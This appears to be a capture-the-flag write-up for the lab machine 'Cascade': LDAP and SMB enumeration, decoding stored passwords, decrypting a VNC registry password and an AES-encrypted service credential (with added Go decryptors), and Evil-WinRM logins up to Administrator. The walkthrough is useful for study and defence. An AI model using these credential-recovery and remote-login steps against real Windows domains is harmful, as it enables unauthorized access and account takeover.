Cascade

Nmap

nmap -sC -sV -T5 -p- 10.10.10.182

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-05-21 13:07:08Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49165/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3m28s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-05-21T13:08:00
|_  start_date: 2020-05-21T04:48:14

User

Checking LDAP

ldapsearch -h 10.10.10.182 -p 389 -x -b "dc=cascade,dc=local" > ldap.txt

It returns a lot of information, so I redirected it to a file to make it easier to search,
and I searched through it for users and possible passwords

CascGuest@cascade.local
arksvc@cascade.local
s.smith@cascade.local
r.thompson@cascade.local    <-- clk0bjVldmE=
util@cascade.local
j.wakefield@cascade.local
s.hickson@cascade.local
j.goodhand@cascade.local
a.turnbull@cascade.local
e.crowe@cascade.local
b.hanson@cascade.local
d.burman@cascade.local
BackupSvc@cascade.local
j.allen@cascade.local
i.croft@cascade.local

In one user's data I found a base64-encoded password
in the “cascadeLegacyPwd” attribute

echo "clk0bjVldmE=" | base64 -d
rY4n5eva
user: "r.thompson"
password: "rY4n5eva"
smbclient -L \\\\10.10.10.182\\ -U r.thompson%rY4n5eva

WARNING: The "syslog" option is deprecated

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	Audit$          Disk      
	C$              Disk      Default share
	Data            Disk      
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	print$          Disk      Printer Drivers
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available
smbclient \\\\10.10.10.182\\NETLOGON -U r.thompson%rY4n5eva 

WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 15 21:50:33 2020
  ..                                  D        0  Wed Jan 15 21:50:33 2020
  MapAuditDrive.vbs                   A      258  Wed Jan 15 21:50:15 2020
  MapDataDrive.vbs                    A      255  Wed Jan 15 21:51:03 2020
smbclient \\\\10.10.10.182\\print$ -U r.thompson%rY4n5eva

WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jul 14 06:37:10 2009
  ..                                  D        0  Tue Jul 14 06:37:10 2009
  color                               D        0  Tue Jul 14 06:37:10 2009
  IA64                                D        0  Tue Jul 14 05:58:30 2009
  W32X86                              D        0  Tue Jul 14 05:58:30 2009
  x64                                 D        0  Mon Jan 13 03:09:11 2020
smbclient \\\\10.10.10.182\\Data -U r.thompson%rY4n5eva

WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 27 03:27:34 2020
  ..                                  D        0  Mon Jan 27 03:27:34 2020
  Contractors                         D        0  Mon Jan 13 01:45:11 2020
  Finance                             D        0  Mon Jan 13 01:45:06 2020
  IT                                  D        0  Tue Jan 28 18:04:51 2020
  Production                          D        0  Mon Jan 13 01:45:18 2020
  Temps                               D        0  Mon Jan 13 01:45:15 2020

There are quite a few files to look through, but the most interesting ones are in “Data”

firefox "./IT/Email Archives/Meeting_Notes_June_2018.html"
cat './IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log'
1/10/2018 15:43	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43	[MAIN_THREAD]	Validating settings...
1/10/2018 15:43	[MAIN_THREAD]	Error: Access is denied
1/10/2018 15:43	[MAIN_THREAD]	Exiting with error code 5
2/10/2018 15:56	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56	[MAIN_THREAD]	Validating settings...
2/10/2018 15:56	[MAIN_THREAD]	Running as user CASCADE\ArkSvc
2/10/2018 15:56	[MAIN_THREAD]	Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56	[MAIN_THREAD]	Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56	[MAIN_THREAD]	Exiting with error code 0	
8/12/2018 12:22	[MAIN_THREAD]	** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22	[MAIN_THREAD]	Validating settings...
8/12/2018 12:22	[MAIN_THREAD]	Running as user CASCADE\ArkSvc
8/12/2018 12:22	[MAIN_THREAD]	Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22	[MAIN_THREAD]	Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22	[MAIN_THREAD]	Exiting with error code 0
cat ./IT/Temp/s.smith/VNC\ Install.reg 

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
...
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
...

We see that the TempAdmin user could be used, and I found the hex of a password along with info that it belongs to some VNC server

Google suggests that you need to drop the commas from the password, and there is a decrypter available for download:

https://www.raymond.cc/blog/crack-or-decrypt-vnc-server-encrypted-password/

password - "sT333ve2"
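The same decode done locally, as an added example that is not part of the original writeup: VNC servers store the password under a fixed, publicly known DES key, so the registry value is obfuscation rather than protection, and a defender auditing exported `.reg` files can recover it the same way. The key bytes below are the standard VNC key in normal DES byte order (an assumption drawn from the VNC sources, not from this page).

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// vncObfuscationKey is the fixed DES key every VNC server uses to store the
// password. The VNC sources list it as 23,82,107,6,35,78,88,7 with each byte
// bit-reversed; in standard DES byte order that is e8 4a d6 60 c4 72 1a e0.
// Because the key is constant and public, anyone who can read the registry
// value can read the password.
var vncObfuscationKey = []byte{0xe8, 0x4a, 0xd6, 0x60, 0xc4, 0x72, 0x1a, 0xe0}

// DecodeVNCPassword takes the value exactly as regedit exports it
// ("hex:6b,cf,...") and returns the plaintext password (max 8 chars, NUL padded).
func DecodeVNCPassword(regValue string) (string, error) {
	v := strings.TrimPrefix(strings.TrimSpace(regValue), "hex:")
	v = strings.ReplaceAll(v, ",", "") // drop the commas regedit inserts
	ct, err := hex.DecodeString(v)
	if err != nil {
		return "", err
	}
	if len(ct) != des.BlockSize {
		return "", fmt.Errorf("expected %d bytes, got %d", des.BlockSize, len(ct))
	}
	block, err := des.NewCipher(vncObfuscationKey)
	if err != nil {
		return "", err
	}
	pt := make([]byte, des.BlockSize)
	block.Decrypt(pt, ct) // one ECB block; identical to CBC with a zero IV
	return strings.TrimRight(string(pt), "\x00"), nil
}

func main() {
	// value quoted from the VNC Install.reg file above
	pw, err := DecodeVNCPassword("hex:6b,cf,2a,4b,6e,5a,ca,0f")
	if err != nil {
		panic(err)
	}
	fmt.Println(pw) // sT333ve2
}
```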
/opt/evil-winrm/evil-winrm.rb -i 10.10.10.182 -u s.smith -p "sT333ve2" 

*Evil-WinRM* PS C:\Users\s.smith\Documents> cat ../Desktop/user.txt
844d54a03ee2***796e1107e8c3

Root

smbclient \\\\10.10.10.182\\Audit$ -U s.smith%sT333ve2  

smb: \> ls
  .                                   D        0  Wed Jan 29 18:01:26 2020
  ..                                  D        0  Wed Jan 29 18:01:26 2020
  CascAudit.exe                       A    13312  Tue Jan 28 21:46:51 2020
  CascCrypto.dll                      A    12288  Wed Jan 29 18:00:20 2020
  DB                                  D        0  Tue Jan 28 21:40:59 2020
  RunAudit.bat                        A       45  Tue Jan 28 23:29:47 2020
  System.Data.SQLite.dll              A   363520  Sun Oct 27 06:38:36 2019
  System.Data.SQLite.EF6.dll          A   186880  Sun Oct 27 06:38:38 2019
  x64                                 D        0  Sun Jan 26 22:25:27 2020
  x86                                 D        0  Sun Jan 26 22:25:27 2020
smbget -R smb://10.10.10.182/Audit$ -U s.smith

Password for [s.smith] connecting to //Audit$/10.10.10.182: 
Using workgroup WORKGROUP, user s.smith
smb://10.10.10.182/Audit$/CascAudit.exe
smb://10.10.10.182/Audit$/CascCrypto.dll
smb://10.10.10.182/Audit$/DB/Audit.db
smb://10.10.10.182/Audit$/RunAudit.bat
smb://10.10.10.182/Audit$/System.Data.SQLite.dll
smb://10.10.10.182/Audit$/System.Data.SQLite.EF6.dll
smb://10.10.10.182/Audit$/x64/SQLite.Interop.dll
smb://10.10.10.182/Audit$/x86/SQLite.Interop.dll
Downloaded 3,33MB in 28 seconds

In the database we find more credentials (password in base64)

Username "ArkSvc"
Password "BQO5l5Kj9MdErXx6Q6AGOw=="

Next, using dnSpy, we find the key, the IV, and that the cipher is AES in CBC mode;
I will list only excerpts

CascAudit.exe -> CascAudiot -> MainModule
...
password = Crypto.DecryptString(encryptedString, "c4scadek3y654321");
...

CascCrypto.dll -> CascCrypto -> Crypto
...
aes.KeySize = 128;
aes.BlockSize = 128;
aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
aes.Mode = 1;
...

CyberChef to the rescue

login    "ArkSvc"
password "w3lc0meFr31nd"
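The CyberChef step reproduced in code, as an added example that is not part of the original writeup. It mirrors what the decompiled CascCrypto.dll does (AES-128-CBC, UTF-8 key, constant IV, PKCS#7 padding, base64 ciphertext; `.NET` `CipherMode` value 1 is CBC), which is why a key and IV embedded in a binary that every auditor can download give the stored credential no real protection. The function and variable names are mine, not the binary's.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"errors"
	"fmt"
)

// Values quoted from the decompiled binaries above.
const (
	auditKey = "c4scadek3y654321" // passed by CascAudit.exe to Crypto.DecryptString
	auditIV  = "1tdyjCbY1Ix49842" // hardcoded in CascCrypto.dll
)

// DecryptAuditString reverses CascCrypto's scheme: base64 -> AES-128-CBC with
// the fixed IV -> strip PKCS#7 padding. Malformed padding is reported rather
// than silently trimmed, so a wrong key or IV shows up as an error.
func DecryptAuditString(b64 string, key string) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("ciphertext is not a whole number of AES blocks")
	}
	block, err := aes.NewCipher([]byte(key)) // 16-byte key -> AES-128
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, []byte(auditIV)).CryptBlocks(pt, ct)
	pad := int(pt[len(pt)-1])
	if pad == 0 || pad > aes.BlockSize ||
		!bytes.Equal(pt[len(pt)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return "", errors.New("bad PKCS#7 padding (wrong key or IV?)")
	}
	return string(pt[:len(pt)-pad]), nil
}

func main() {
	// ciphertext quoted from Audit.db above
	pw, err := DecryptAuditString("BQO5l5Kj9MdErXx6Q6AGOw==", auditKey)
	if err != nil {
		panic(err)
	}
	fmt.Println(pw) // w3lc0meFr31nd
}
```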
/opt/evil-winrm/evil-winrm.rb -i 10.10.10.182 -u ArkSvc -p "w3lc0meFr31nd"
*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami /all

USER INFORMATION
----------------

User Name      SID
============== ==============================================
cascade\arksvc S-1-5-21-3332504370-1206983947-1165150453-1106


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                            Attributes
=========================================== ================ ============================================== ===============================================================
Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share                          Alias            S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT                                  Alias            S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\AD Recycle Bin                      Alias            S-1-5-21-3332504370-1206983947-1165150453-1119 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users             Alias            S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

We have the rights of the AD Recycle Bin group; earlier there was info in the e-mail about the deleted admin account “TempAdmin”, and in the database there was some deleted account

https://github.com/samratashok/ADModule

has instructions on how to use the AD management module

https://docs.microsoft.com/en-us/powershell/module/addsadministration/get-adobject?view=win10-p

Get-ADObject -Filter 'isDeleted -eq $True' -IncludeDeletedObjects -Properties *

...
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin
...
echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d

"baCT3r1aN00dles"

It is not possible to log in to the TempAdmin account, but in the e-mail they wrote that it is the same password as the admin's

/opt/evil-winrm/evil-winrm.rb -i 10.10.10.182 -u Administrator -p "baCT3r1aN00dles"

*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
4067bfcb8d568***070d219a6869
